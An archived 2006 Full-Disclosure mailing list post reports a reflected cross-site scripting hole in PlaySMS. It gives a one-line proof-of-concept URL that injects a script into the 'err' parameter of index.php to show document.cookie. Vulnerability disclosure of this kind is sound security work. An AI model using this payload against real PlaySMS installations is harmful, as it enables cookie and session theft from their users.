[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] XSS in PlaySMS
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail ! com>
Date: 2006-02-11 23:35:26
Message-ID: 470c3dd0602111535i311051bbtb0fe2cc4efdbb71d () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
[Attachment #4 (text/plain)]
I Found an XSS Vulnerability in PlaySmS
Site:
playsms.sourceforge.net
PoC:
www.target.com/playsms/index.php?err=<script>alert(document.cookie);</script
>
Salam
http://mohajali.lezr.org
--
(r).....Now I Am Become Death....The Destroyer Of Worlds....(c)
[Attachment #5 (text/html)]
<div>I Found an XSS Vulnerability in PlaySmS</div>
<div> </div>
<div>Site:</div>
<div><a href="http://playsms.sourceforge.net">playsms.sourceforge.net</a></div>
<div> </div>
<div> </div>
<div>PoC:</div>
<div><a href="http://www.target.com/playsms/index.php?err=<script>alert(document \
.cookie);</script">www.target.com/playsms/index.php?err=<script>alert(document.cookie);</script</a>></div>
<div> </div>
<div>Salam</div>
<div> </div>
<div><a href="http://mohajali.lezr.org">http://mohajali.lezr.org</a><br>-- \
<br>®.....Now I Am Become Death....The Destroyer Of Worlds....© </div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic